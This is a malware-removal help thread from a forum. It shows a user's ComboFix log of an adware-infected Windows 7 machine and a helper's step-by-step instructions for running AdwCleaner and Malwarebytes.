2014-07-25 11:01 . 2014-07-28 04:24 -------- d-----w- c:\users\User\AppData\Local\1682
2014-07-25 10:49 . 2014-07-28 09:16 -------- d-----w- c:\program files\Bulk Rename Utility
2014-07-25 03:31 . 2014-07-25 03:31 687 ----a-w- C:\awhE954.tmp
2014-07-24 05:40 . 2014-08-01 07:55 -------- d-----w- c:\program files\VisualSVN Server
2014-07-24 03:28 . 2014-07-24 03:28 687 ----a-w- C:\awhDC4A.tmp
2014-07-23 03:40 . 2014-07-23 03:40 687 ----a-w- C:\awhDDEF.tmp
2014-07-22 10:08 . 2014-07-22 13:09 -------- d-----w- c:\users\User\AppData\Roaming\DBDesigner4
2014-07-22 09:37 . 2014-07-22 09:37 687 ----a-w- C:\awhE1D6.tmp
2014-07-22 03:39 . 2014-07-22 03:39 687 ----a-w- C:\awhE465.tmp
2014-07-21 03:36 . 2014-07-21 03:36 687 ----a-w- C:\awhDBEC.tmp
2014-07-18 03:31 . 2014-07-18 03:31 687 ----a-w- C:\awhDCA8.tmp
2014-07-16 03:32 . 2014-07-16 03:32 687 ----a-w- C:\awhD8A2.tmp
2014-07-15 03:31 . 2014-07-15 03:31 687 ----a-w- C:\awhD9F9.tmp
2014-07-14 03:41 . 2014-07-14 03:41 687 ----a-w- C:\awhD9CA.tmp
2014-07-11 03:23 . 2014-07-11 03:23 687 ----a-w- C:\awhDCF6.tmp
2014-07-10 04:24 . 2014-07-10 04:24 687 ----a-w- C:\awhDA18.tmp
2014-07-10 03:30 . 2014-07-10 03:30 687 ----a-w- C:\awhDC88.tmp
2014-07-09 03:29 . 2014-07-09 03:29 687 ----a-w- C:\awhDCD6.tmp
2014-07-08 03:37 . 2014-07-08 03:37 687 ----a-w- C:\awhE0EC.tmp
2014-07-07 03:40 . 2014-07-07 03:40 687 ----a-w- C:\awhD74B.tmp
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-07-30 09:21 . 2014-07-30 09:21 776976 ----a-w- c:\windows\system32\drivers\aswsnx.sys.1406712158422
2014-07-30 09:21 . 2014-07-30 09:21 411552 ----a-w- c:\windows\system32\drivers\aswsp.sys.1406712158422
2014-07-23 05:07 . 2011-06-06 04:05 231584 ------w- c:\windows\system32\MpSigStub.exe
2014-07-09 06:51 . 2012-04-08 03:41 699056 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-07-09 06:51 . 2011-06-06 04:12 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-07-04 03:40 . 2014-07-04 03:40 687 ----a-w- C:\awhE12A.tmp
2014-07-03 08:53 . 2014-07-03 08:53 0 ----a-w- c:\users\User\.mongorc.js
2014-07-03 08:36 . 2014-07-03 08:36 687 ----a-w- C:\awhE407.tmp
2014-07-03 03:40 . 2014-07-03 03:40 687 ----a-w- C:\awhDA09.tmp
2014-07-02 04:48 . 2014-07-02 04:48 687 ----a-w- C:\awhE233.tmp
2014-07-01 03:53 . 2014-07-01 03:53 687 ----a-w- C:\awhDC1C.tmp
2014-06-30 08:19 . 2014-06-30 08:19 687 ----a-w- C:\awhDC1B.tmp
2014-06-30 03:34 . 2014-06-30 03:34 687 ----a-w- C:\awhEC80.tmp
2014-06-27 13:39 . 2014-06-27 13:39 687 ----a-w- C:\awhEE06.tmp
2014-06-27 03:39 . 2014-06-27 03:39 687 ----a-w- C:\awhE4E2.tmp
2014-06-26 10:17 . 2014-06-26 10:17 687 ----a-w- C:\awh1E87.tmp
2014-06-26 03:31 . 2014-06-26 03:31 687 ----a-w- C:\awhE926.tmp
2014-06-25 03:40 . 2014-06-25 03:40 687 ----a-w- C:\awhE0CC.tmp
2014-06-24 13:22 . 2014-06-24 13:22 687 ----a-w- C:\awhF72A.tmp
2014-06-24 03:33 . 2014-06-24 03:33 687 ----a-w- C:\awhE54F.tmp
2014-06-23 04:15 . 2014-06-23 04:15 687 ----a-w- C:\awhEB76.tmp
2014-06-17 10:37 . 2014-06-17 10:37 188696 ----a-w- c:\windows\system32\drivers\avgldx86.sys
2014-06-17 10:36 . 2014-06-17 10:36 197400 ----a-w- c:\windows\system32\drivers\avgtdix.sys
2014-06-17 10:33 . 2014-06-17 10:33 241944 ----a-w- c:\windows\system32\drivers\avglogx.sys
2014-06-17 10:32 . 2014-06-17 10:32 147736 ----a-w- c:\windows\system32\drivers\avgidshx.sys
2014-06-17 10:21 . 2014-06-17 10:21 199960 ----a-w- c:\windows\system32\drivers\avgidsdriverx.sys
2014-06-17 10:21 . 2014-06-17 10:21 121624 ----a-w- c:\windows\system32\drivers\avgdiskx.sys
2014-06-17 10:21 . 2014-06-17 10:21 98584 ----a-w- c:\windows\system32\drivers\avgmfx86.sys
2014-06-17 10:21 . 2014-06-17 10:21 27416 ----a-w- c:\windows\system32\drivers\avgrkx86.sys
2014-06-17 10:21 . 2014-06-17 10:21 21272 ----a-w- c:\windows\system32\drivers\avgidsshimx.sys
.
.
------- Sigcheck -------
Note: Unsigned files aren't necessarily malware.
.
[-] 2012-02-05 . 7BD7F45FF37FA0669CD32CA0EF46E22C . 811520 . . [6.1.7600.16385] . . c:\windows\System32\user32.dll
[7] 2010-11-20 . F1DD3ACAEE5E6B4BBC69BC6DF75CEF66 . 811520 . . [6.1.7601.17514] . . c:\windows\SoftwareDistribution\Download\18e2c83e42cc8f0cc17b5dbfaf982690\x86_microsoft-windows-user32_31bf3856ad364e35_6.1.7601.17514_none_cf3fd62ccb9e983d\user32.dll
[7] 2009-07-14 . 34B7E222E81FAFA885F0C5F2CFA56861 . 811520 . . [6.1.7600.16385] . . c:\windows\winsxs\x86_microsoft-windows-user32_31bf3856ad364e35_6.1.7600.16385_none_cd0ec264ceb014a3\user32.dll
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt1"]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ------w- c:\users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt2"]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ------w- c:\users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt3"]
@="{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ------w- c:\users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt4"]
@="{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ------w- c:\users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt5"]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ------w- c:\users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt6"]
@="{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ------w- c:\users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt7"]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ------w- c:\users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt8"]
@="{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ------w- c:\users\User\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1TortoiseNormal]
@="{C5994560-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994560-53D9-4125-87C9-F193FC689CB2}]
2011-06-13 04:35 64792 ------w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\2TortoiseModified]
@="{C5994561-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994561-53D9-4125-87C9-F193FC689CB2}]
2011-06-13 04:35 64792 ------w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\3TortoiseConflict]
@="{C5994562-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994562-53D9-4125-87C9-F193FC689CB2}]
2011-06-13 04:35 64792 ------w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\4TortoiseLocked]
@="{C5994563-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994563-53D9-4125-87C9-F193FC689CB2}]
2011-06-13 04:35 64792 ------w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\5TortoiseReadOnly]
@="{C5994564-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994564-53D9-4125-87C9-F193FC689CB2}]
2011-06-13 04:35 64792 ------w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\6TortoiseDeleted]
@="{C5994565-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994565-53D9-4125-87C9-F193FC689CB2}]
2011-06-13 04:35 64792 ------w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\7TortoiseAdded]
@="{C5994566-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994566-53D9-4125-87C9-F193FC689CB2}]
2011-06-13 04:35 64792 ------w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\8TortoiseIgnored]
@="{C5994567-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994567-53D9-4125-87C9-F193FC689CB2}]
2011-06-13 04:35 64792 ------w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\9TortoiseUnversioned]
@="{C5994568-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994568-53D9-4125-87C9-F193FC689CB2}]
2011-06-13 04:35 64792 ------w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2009-07-14 1173504]
"Free Download Manager"="c:\program files\Free Download Manager\fdm.exe" [2014-07-30 6875136]
"WordWeb"="c:\program files\WordWeb\wweb32.exe" [2013-05-16 77056]
"Skype"="c:\program files\Skype\Phone\Skype.exe" [2014-05-08 21445248]
"ownCloud"="c:\program files\ownCloud\owncloud.exe" [2014-06-26 17381826]
"RESTART_STICKY_NOTES"="c:\windows\System32\StikyNot.exe" [2009-07-14 354304]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"GrooveMonitor"="c:\program files\Microsoft Office\Office12\GrooveMonitor.exe" [2006-10-27 31016]
"AdobeCS5ServiceManager"="c:\program files\Common Files\Adobe\CS5ServiceManager\CS5ServiceManager.exe" [2010-02-21 406992]
"SwitchBoard"="c:\program files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe" [2010-02-19 517096]
"APSDaemon"="c:\program files\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-04-23 43848]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2009-10-02 35696]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2009-09-04 935288]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2009-09-14 141848]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2009-09-14 173592]
"Persistence"="c:\windows\system32\igfxpers.exe" [2009-09-14 150552]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2012-01-17 252296]
"googletalk"="c:\program files\Google\Google Talk\googletalk.exe" [2014-07-30 3739648]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2014-05-26 152392]
"AVG_UI"="c:\program files\AVG\AVG2014\avgui.exe" [2014-06-17 5179408]
"vProt"="c:\program files\AVG Web TuneUp\vprot.exe" [2014-08-01 2575384]
.
c:\users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Dropbox.lnk - c:\users\User\AppData\Roaming\Dropbox\bin\Dropbox.exe /systemstartup [2014-7-22 35464216]
EvernoteClipper.lnk - c:\program files\Evernote\Evernote\EvernoteClipper.exe [2014-7-21 1109344]
OneNote 2007 Screen Clipper and Launcher.lnk - c:\program files\Microsoft Office\Office12\ONENOTEM.EXE /tsr [2006-10-27 98632]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Snagit 11.lnk - c:\program files\TechSmith\Snagit 11\Snagit32.exe [2012-9-7 9519544]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"PromptOnSecureDesktop"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe Reader Speed Launcher]
2009-10-02 22:23 35696 ------w- c:\program files\Adobe\Reader 9.0\Reader\reader_sl.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AdobeAAMUpdater-1.0]
2010-03-05 21:59 500208 ------w- c:\program files\Common Files\Adobe\OOBE\PDApp\UWA\updaterstartuputility.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AdobeBridge]
2010-03-08 22:43 11989960 ------w- c:\program files\Adobe\Adobe Bridge CS5\Bridge.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2014-05-26 13:27 152392 ------w- c:\program files\iTunes\iTunesHelper.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Messenger (Yahoo!)]
2009-11-10 23:39 5244216 ------w- c:\program files\Yahoo!\Messenger\YahooMessenger.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\NeroFilterCheck]
2001-07-09 18:50 155648 ----a-w- c:\windows\System32\NeroCheck.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2014-07-31 07:41 421888 ----a-w- c:\program files\QuickTime\QTTask.exe
.
R2 AVGIDSAgent;AVGIDSAgent;c:\program files\AVG\AVG2014\avgidsagent.exe [2014-06-27 3241488]
R2 MongoDB;Mongo DB;d:\wamp\bin\mongodb\mongodb-win32-i386-2.4.5\bin\mongod.exe [2014-07-31 11314688]
R2 SkypeUpdate;Skype Updater;c:\program files\Skype\Updater\Updater.exe [2013-10-23 172192]
R3 L1C;NDIS Miniport Driver for Atheros AR8131/AR8132 PCI-E Ethernet Controller (NDIS 6.20);c:\windows\system32\DRIVERS\L1C62x86.sys [2009-07-13 50688]
R3 McComponentHostService;McAfee Security Scan Component Host Service;c:\program files\McAfee Security Scan\3.8.150\McCHSvc.exe [x]
R3 SwitchBoard;SwitchBoard;c:\program files\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [2010-02-19 517096]
R3 Te.Service;Te.Service;c:\program files\Windows Kits\8.0\Testing\Runtimes\TAEF\Wex.Services.exe [2014-07-31 94208]
R3 vrepocfgsvc;VisualSVN Repository Configurator Service;c:\program files\VisualSVN Server\bin\vrepocfgsvc.exe [2014-06-10 122000]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2011-06-06 1343400]
R3 WMSVC;Web Management Service;c:\windows\system32\inetsrv\wmsvc.exe [2009-07-14 9728]
R4 MSSQLServerADHelper100;SQL Active Directory Helper Service;c:\program files\Microsoft SQL Server\100\Shared\SQLADHLP.EXE [2008-07-10 47128]
R4 RsFx0102;RsFx0102 Driver;c:\windows\system32\DRIVERS\RsFx0102.sys [2008-07-09 242712]
S0 AVGIDSHX;AVGIDSHX;c:\windows\system32\DRIVERS\avgidshx.sys [2014-06-17 147736]
S0 Avglogx;AVG Logging Driver;c:\windows\system32\DRIVERS\avglogx.sys [2014-06-17 241944]
S0 Avgrkx86;AVG Anti-Rootkit Driver;c:\windows\system32\DRIVERS\avgrkx86.sys [2014-06-17 27416]
S1 Avgdiskx;AVG Disk Driver;c:\windows\system32\DRIVERS\avgdiskx.sys [2014-06-17 121624]
S1 AVGIDSDriver;AVGIDSDriver;c:\windows\system32\DRIVERS\avgidsdriverx.sys [2014-06-17 199960]
S1 AVGIDSShim;AVGIDSShim;c:\windows\system32\DRIVERS\avgidsshimx.sys [2014-06-17 21272]
S1 Avgldx86;AVG AVI Loader Driver;c:\windows\system32\DRIVERS\avgldx86.sys [2014-06-17 188696]
S1 Avgtdix;AVG TDI Driver;c:\windows\system32\DRIVERS\avgtdix.sys [2014-06-17 197400]
S1 avgtp;avgtp;c:\windows\system32\drivers\avgtpx86.sys [2014-08-01 42784]
S2 avgwd;AVG WatchDog;c:\program files\AVG\AVG2014\avgwdsvc.exe [2014-06-17 289328]
S2 c2cautoupdatesvc;Skype Click to Call Updater;c:\program files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [2014-07-14 1390176]
S2 c2cpnrsvc;Skype Click to Call PNR Service;c:\program files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [2014-07-14 1767520]
S2 ftpsvc;Microsoft FTP Service;c:\windows\system32\svchost.exe [2009-07-14 20992]
S2 postgresql-9.2;postgresql-9.2 - PostgreSQL Server 9.2;C:/Program Files/PostgreSQL/9.2/bin/pg_ctl.exe runservice -N postgresql-9.2 -D C:/Program Files/PostgreSQL/9.2/data -w [x]
S2 TeamViewer9;TeamViewer 9;c:\program files\TeamViewer\Version9\TeamViewer_Service.exe [2014-07-02 5037888]
S2 VisualSVNServer;VisualSVN Server;c:\program files\VisualSVN Server\bin\VisualSVNServer.exe [2014-06-10 24208]
S2 vToolbarUpdater3.1.0;vToolbarUpdater3.1.0;c:\program files\Common Files\AVG Secure Search\vToolbarUpdater\3.1.0\ToolbarUpdater.exe [2014-08-01 1814040]
S3 MSSQLFDLauncher;SQL Full-text Filter Daemon Launcher (MSSQLSERVER);c:\program files\Microsoft SQL Server\MSSQL10.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe [2008-07-09 31256]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt86win7.sys [2010-06-23 275048]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
ftpsvc REG_MULTI_SZ   ftpsvc
iissvcs REG_MULTI_SZ   w3svc was
apphost REG_MULTI_SZ   apphostsvc
.
[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-07-21 09:24 1104200 ------w- c:\program files\Google\Chrome\Application\36.0.1985.125\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-08-05 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-08 06:51]
.
2014-08-05 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-10-08 04:42]
.
2014-08-05 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-10-08 04:42]
.
.
------- Supplementary Scan -------
.
uInternet Settings,ProxyOverride = *.local
uInternet Settings,ProxyServer = 133.242.131.152:443
IE: Clip Image - c:\program files\Evernote\Evernote\\EvernoteIERes\Clip.html?clipAction=4
IE: Clip selection - c:\program files\Evernote\Evernote\\EvernoteIERes\Clip.html?clipAction=3
IE: Clip this page - c:\program files\Evernote\Evernote\\EvernoteIERes\Clip.html?clipAction=1
IE: Clip URL - c:\program files\Evernote\Evernote\\EvernoteIERes\Clip.html?clipAction=0
IE: Download all with Free Download Manager - file://c:\program files\Free Download Manager\dlall.htm
IE: Download selected with Free Download Manager - file://c:\program files\Free Download Manager\dlselected.htm
IE: Download video with Free Download Manager - file://c:\program files\Free Download Manager\dlfvideo.htm
IE: Download with Free Download Manager - file://c:\program files\Free Download Manager\dllink.htm
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~2\Office12\EXCEL.EXE/3000
IE: New Note - c:\program files\Evernote\Evernote\\EvernoteIERes\NewNote.html
TCP: DhcpNameServer = 192.168.1.1
TCP: Interfaces\{63FC3279-79DA-467C-9214-685FFAC4C36B}: NameServer = 192.168.1.1
TCP: Interfaces\{DD3FC8E9-6A2B-4F35-A1CF-48A32145169C}: DhcpNameServer = 192.168.1.1
Handler: viprotocol - {B658800C-F66E-4EF3-AB85-6C0C227862A9} - c:\program files\Common Files\AVG Secure Search\ViProtocolInstaller\3.1.0\ViProtocol.dll
FF - ProfilePath - c:\users\User\AppData\Roaming\Mozilla\Firefox\Profiles\0kr43kwj.default\
FF - prefs.js: network.proxy.http - 125.195.133.102
FF - prefs.js: network.proxy.http_port - 808
FF - prefs.js: network.proxy.type - 0
.
- - - - ORPHANS REMOVED - - - -
.
BHO-{01d7c86a-b746-4647-afed-d88f7528f044} - c:\program files\MediaWatchV1\MediaWatchV1home1288\ie\MediaWatchV1home1288.dll
BHO-{6edc79e0-4d6f-4de7-be61-f8e9bc80fd50} - c:\program files\MediaViewerV1\MediaViewerV1alpha442\ie\MediaViewerV1alpha442.dll
BHO-{d0c64ff5-c2d4-4f66-9fa3-69d4846db615} - c:\program files\MediaBuzzV1\MediaBuzzV1mode6898\ie\MediaBuzzV1mode6898.dll
BHO-{d6f31e2c-0a30-4b60-a44c-141aa27478d4} - c:\program files\MediaViewV1\MediaViewV1alpha678\ie\MediaViewV1alpha678.dll
BHO-{df68ab54-afc1-4005-aa2f-6a6ae5d2dea0} - c:\program files\MediaPlayerV1\MediaPlayerV1alpha583\ie\MediaPlayerV1alpha583.dll
BHO-{f9aaacf6-0ca0-4ff4-8f71-d935d2eb86fd} - c:\program files\RichMediaViewV1\RichMediaViewV1release335\ie\RichMediaViewV1release335.dll
Toolbar-10 - (no file)
Toolbar-!{687578b9-7132-4a7a-80e4-30ee31099e03} - (no file)
ShellIconOverlayIdentifiers-{472083B0-C522-11CF-8763-00608CC02F24} - (no file)
SafeBoot-98891617.sys
MSConfigStartUp-Facebook Update - c:\users\User\AppData\Local\Facebook\Update\FacebookUpdate.exe
MSConfigStartUp-googletalk - c:\users\User\AppData\Roaming\Google\Google Talk\googletalk.exe
.
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\postgresql-9.2]
"ImagePath"="C:/Program Files/PostgreSQL/9.2/bin/pg_ctl.exe runservice -N \"postgresql-9.2\" -D \"C:/Program Files/PostgreSQL/9.2/data\" -w"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\postgresql-9.2]
"ImagePath"="C:/Program Files/PostgreSQL/9.2/bin/pg_ctl.exe runservice -N \"postgresql-9.2\" -D \"C:/Program Files/PostgreSQL/9.2/data\" -w"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-3613995967-3578341659-1565537388-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*A*x*i*x*碍8\OpenWithList]
@Class="Shell"
"a"="vlc.exe"
"MRUList"="a"
.
[HKEY_USERS\S-1-5-21-3613995967-3578341659-1565537388-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*L*e*m*o*2痃0*・eating demux: access='file' demux='' path='c:\users\User\Downloads\Ant Videos\youtube.com.Arigatou - Kokia - YouTube.flv'*]
@Class="Shell"
.
[HKEY_USERS\S-1-5-21-3613995967-3578341659-1565537388-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*L*e*m*o*2痃0*・eating demux: access='file' demux='' path='c:\users\User\Downloads\Ant Videos\youtube.com.Arigatou - Kokia - YouTube.flv'*\OpenWithList]
@Class="Shell"
"a"="vlc.exe"
"MRUList"="a"
.
[HKEY_USERS\S-1-5-21-3613995967-3578341659-1565537388-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*L*e*m*o*wh0@\OpenWithList]
@Class="Shell"
"a"="vlc.exe"
"MRUList"="a"
.
[HKEY_USERS\S-1-5-21-3613995967-3578341659-1565537388-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.*L*e*m*o*q勛aQ*utube.com.Arigatou%20-%20Kokia%20-%20YouTube.flv*a\OpenWithList]
@Class="Shell"
"a"="vlc.exe"
"MRUList"="a"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
--------------------- DLLs Loaded Under Running Processes ---------------------
.
- - - - - - - > 'Explorer.exe'(3976)
c:\program files\WordWeb\WHook.dll
.
Completion time: 2014-08-05  11:41:17
ComboFix-quarantined-files.txt  2014-08-05 05:56
.
Pre-Run: 44,740,022,272 bytes free
Post-Run: 44,633,104,384 bytes free
.
- - End Of File - - 4BEA95B7165F37B35F86D001BD61DA55
A36C5E4F47E84449FF07ED3517B43A31


Now eagerly waiting for your next reply. :) . Hope i can have a way out of it. 

-justBee-

 

 

 

 



#8 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,079 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:05:54 AM

Posted 05 August 2014 - 06:37 AM

Hi jsutbee,
 
Please download AdwCleaner by Xplode and save to your Desktop.

  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select Run As Administrator.
  • Click on the Scan button.
  • AdwCleaner will begin...be patient as the scan may take some time to complete.
  • Click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
  • After rebooting, a logfile report (AdwCleaner[S#].txt) will open automatically (where the largest value of # represents the most recent report).
  • Copy and paste the contents of that logfile in your next reply.
  • A copy of that logfile will also be saved in the C:\AdwCleaner folder.

--------------

Please download Malwarebytes Anti-Malware to your desktop.

  • Double-click mb3-setup-1878.1878-3.5.1.2522.exe and follow the prompts to install the program.
  • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
  • Click Finish.
  • On the Dashboard, click the 'Update Now >>' link
  • After the update completes, click the 'Scan Now >>' button.
  • Or, on the Dashboard, click the Scan Now >> button.
  • If an update is available, click the Update Now button.
  • A Threat Scan will begin.
  • When completed click the down arrow on Export Log and select Text file (*.txt)
  • Save the file to your desktop as MBAM
  • Exit the program without taking any action.
  • Copy and paste the contents of MBAM.txt in your reply

--------------
 
To recap, in your next reply I would like to see the following. Make sure to copy & paste them unless I ask otherwise:

  • AdwCleaner log
